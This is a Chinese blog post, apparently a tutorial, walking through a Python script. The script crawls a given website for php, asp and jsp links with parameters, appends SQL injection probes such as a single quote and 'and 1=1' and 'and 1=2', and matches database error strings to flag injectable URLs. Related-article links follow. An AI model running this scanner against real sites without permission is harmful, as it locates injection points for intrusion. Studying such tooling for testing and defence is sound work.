前言:

昨天晚上其实就已经写完代码。只不过向FB投稿了,打算延迟一晚上在写博客

所有才到今天早上写。好了,接下来进入正题。

思路:

1.从网站源码中爬取那些类适于:http://xxx.com/xx.php?id=xxx的链接

2.将这些爬取到的链接写入一个URL

3.加入payload

4.用正则过滤掉一些残缺不全的链接

5.将一些报错语句加入一个列表

6.从报错的语句中寻找错误

7.判断字符型注入或数字型注入

代码:

 import requests,re,time,os

 from tqdm import tqdm

 from bs4 import BeautifulSoup

 def zhuru():

     global x,headers,ps

     user=input('[+]Please enter the URL you want to test:') #用户输入要检测的网站

     url="{}".format(user.strip()) #去除两边的空格

     headers={'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36'}

     request=requests.get(url,headers) #浏览器头

     shoujiurl=[] #创建一个收集URL链接的列表

     rse=request.content

     gwd=BeautifulSoup(rse,'html.parser')

     php=gwd.find_all(href=re.compile(r'php\?')) #寻找后缀名为php的链接

     asp=gwd.find_all(href=re.compile(r'asp\?')) #寻找后缀名为asp的链接

     jsp=gwd.find_all(href=re.compile(r'jsp\?')) #寻找后缀名为jsp的链接

     print('[+]Collection URL ')

     for i in tqdm(range(1,500)): #进度条

         time.sleep(0.001) #进度条

     for lk in php:

         basd=lk.get('href') #提取其中的链接

         shoujiurl.append(basd) #加入列表

     for ba in asp:

         basd2=ba.get('href') #提取其中的链接

         shoujiurl.append(basd2) #加入列表

     for op in jsp:

         basd3=op.get('href') #提取其中的链接

         shoujiurl.append(basd3) #加入列表

     print('[+]Collection completed')

     huixian=[]

     huixian1 = "is not a valid MySQL result resource"

     huixian2 = "ODBC SQL Server Driver"

     huixian3 = "Warning:ociexecute"

     huixian4 = "Warning: pq_query[function.pg-query]"

     huixian5 = "You have an error in your SQL syntax"

     huixian6 = "Database Engine"

     huixian7 = "Undefined variable"

     huixian8 = "on line"

     huixian9 = "mysql_fetch_array():"

     huixian.append(huixian1)

     huixian.append(huixian2)

     huixian.append(huixian3)

     huixian.append(huixian4)

     huixian.append(huixian5)

     huixian.append(huixian6)

     huixian.append(huixian7)

     huixian.append(huixian8)

     huixian.append(huixian9)

     for g in huixian:

         ps="".join(g) #过滤掉[]

     payload0="'"

     payload1="''"

     payload2="%20and%201=1"

     payload3="%20and%201=2"

     for x in shoujiurl:

         yuan="".join(x) #过滤掉[]

         ssdx="".join(x)+payload0 #添加payload

         ssdx2="".join(x)+payload1

         ssdx3="".join(x)+payload2

         ssdx4="".join(x)+payload3

         pdul=re.findall('[a-zA-z]+://[^\s]*',ssdx) #过滤掉一些残缺不全的链接

         pdul2=re.findall('[a-zA-z]+://[^\s]*',ssdx2)

         pdul3=re.findall('[a-zA-z]+://[^\s]*',yuan)

         pdul4=re.findall('[a-zA-z]+://[^\s]*',ssdx3)

         pdul5=re.findall('[a-zA-z]+://[^\s]*',ssdx4)

         psuw="".join(pdul) #过滤掉[]

         psuw2="".join(pdul2)

         psuw3="".join(pdul3)

         psuw4="".join(pdul4)

         psuw5="".join(pdul5)

         try:

             resg=requests.get(url=psuw,headers=headers,timeout=6)

             resg2=requests.get(url=psuw2,headers=headers,timeout=6)

             resg3=requests.get(url=psuw3,headers=headers,timeout=6)

             resg4=requests.get(url=psuw4,headers=headers,timeout=6)

             resg5=requests.get(url=psuw5,headers=headers,timeout=6)

             if resg.status_code == 200: #判断状态码是否等于200

                 print('[+]The first step is completed, and the goal is to be stable')

                 time.sleep(1)

                 if resg.content != resg2.content and resg3.content == resg2.content:  #判断是不是字符型注入

                     print('[+]Existence of character injection')

                     print(resg3.url)

                     print(resg3.url,file=open('character.txt','a')) #如果是写入脚本

                 elif resg4.content != resg5.content and resg4.content == resg3.content: #判断是不是数字型注入

                     print('[+]Digital injection')

                     print(resg3.url)

                     print(resg3.url,file=open('injection.txt','a')) #如果是写入脚本

                 else: #两者都不是

                     print('[+]Sorry, not character injection')

                     print('[+]Sorry, not Digital injection')

                     print(resg3.url)

                 if ps in str(resg2.content):

                     print('[+]The wrong sentence to be found',ps)

             elif resg.status_code != 200:

                 print('http_stode:',resg.status_code)

                 print('[-]Sorry, I cant tell if there is an injection')

         except:

           pass

 zhuru()

测试结果如下:

python打造一个分析网站SQL注入的脚本的更多相关文章

  1. python打造一个Mysql数字类型注入脚本(1)

    前言: 总是想写一个sql注入脚本,但是之前的那些都不行. 这次做好了准备,然后嘿嘿嘿. 准备: sql注入的基础知识 熟悉怎么判断 正文: 思路概念图: 这里我没有限制用户输入,不限制的话可能会 @ ...

  2. 点击劫持漏洞之理解 python打造一个挖掘点击劫持漏洞的脚本

    前言: 放假了,上个星期刚刚学习完点击劫持漏洞.没来的及写笔记,今天放学总结了一下 并写了一个检测点击劫持的脚本.点击劫持脚本说一下哈.= =原本是打算把网站源码 中的js也爬出来将一些防御的代码匹配 ...

  3. Python预编译语句防止SQL注入

    这个月太忙,最近不太太平,我的愿望是世界和平! ================================== 今天也在找python的预编译,早上写的sql是拼接来构成的.于是找了2篇文章,还 ...

  4. phantomjs + python 打造一个微信机器人

    phantomjs + python 打造一个微信机器人 1.前奏   媳妇公司不能上网,但经常需要在公众号上找一些文章做一些参考,需要的时候就把文章链接分享给我,然后我在浏览器打开网页,一点点复制过 ...

  5. python之MySQL学习——防止SQL注入

    python之MySQL学习——防止SQL注入 学习了:https://www.cnblogs.com/xiaomingzaixian/p/7126840.html https://www.cnblo ...

  6. 一个PHP的SQL注入完整过程

    本篇文章介绍的内容是一个PHP的SQL注入完整过程,现在分享给大家,有需要的朋友可以参考一下 希望帮助到大家,很多PHPer在进阶的时候总会遇到一些问题和瓶颈,业务代码写多了没有方向感,不知道该从那里 ...

  7. Zabbix sql注入漏洞脚本执行反弹shell

    exp检测是否存在SQL注入漏洞root@ubuntu:~# python zabbix.py http://ip:9090/+------------------------------------ ...

  8. zabbix(sql注入判断脚本)

    zabbix(sql注入判断脚本) #-*-coding:utf-8-*- # code by anyun.org import urllib import re def getHtml(url): ...

  9. python 打造一个sql注入脚本 (一)

    0x00前言: 昨天刚刚看完小迪老师的sql注入篇的第一章 所以有了新的笔记. 0x01笔记: sql注入原理: 网站数据传输中,接受变量传递的值未进行过滤,导致直接带入数据库查询执行的操作. sql ...

随机推荐

  1. RxJava系列1(简介)

    RxJava系列1(简介) RxJava系列2(基本概念及使用介绍) RxJava系列3(转换操作符) RxJava系列4(过滤操作符) RxJava系列5(组合操作符) RxJava系列6(从微观角 ...

  2. Linux中的重启命令

    1.系统重启: shutdowm    该命令安全地将系统关机. 有些用户会使用直接断掉电源的方式来关闭linux,这是十分危险的.因为linux与windows不同,其后台运行着许多进程,所以强制关 ...

  3. windows10无法启动承载网络

    每个都试一下

  4. Struts(十三):通用标签

    Struts标签简介: Struts2标签库提供了主题.模板支持,极大地简化了视图页面的编写,而且,struts2的主题.模板都提供了很好的扩展性,实现了更好的代码复用.Struts2允许在页面中使用 ...

  5. day3 自定义指令详解

    在angular中,Directive,自定义指令的学习,可以更好的理解angular指令的原理,当angular的指令不能满足你的需求的时候,嘿嘿,你就可以来看看这篇文章,自定义自己的指令,可以满足 ...

  6. Testlink1.7.5安装部署

    Testlink1.7.5安装部署 1   下载安装wamp5:下载地址:http://www.duote.com/soft/56016.html wamp5是apache.mysql.PHP的集成环 ...

  7. CentOS 7下Flannel安装与配置

    1. 安装前的准备 etcd 3.2.9 Docker 17.12.0-ce 三台机器10.100.97.236, 10.100.97.92, 10.100.97.81 etcd不同版本之间的差别还是 ...

  8. mv&cp

    mv [选项] [源] [目标] 当目标不存在时,重命名源为目标 当目标存在时,若目标为目录文件,将源移动到目标文件里: 若目标为非目录文件,将源重命名为目标,并强制覆盖目标.   mv -b 1 2 ...

  9. Spring--bean的作用范围

    在Spring中,bean的作用范围分以下几种: singleton:spring ioc容器中仅有一个bean实例,bean以单例的方式存在 prototype:每次从容器中调用bean时,都返回一 ...

  10. 深入理解事件(Event)

    前言 在前一篇文章中讲到了Event 发布与订阅(一) 里面用到了事件来实现一些发布与订阅,当时对事件及其委托理解的还不是太深入,可能在使用上有点捉急.这篇来好好讲讲事件,以及通过一些小DEMO来加深 ...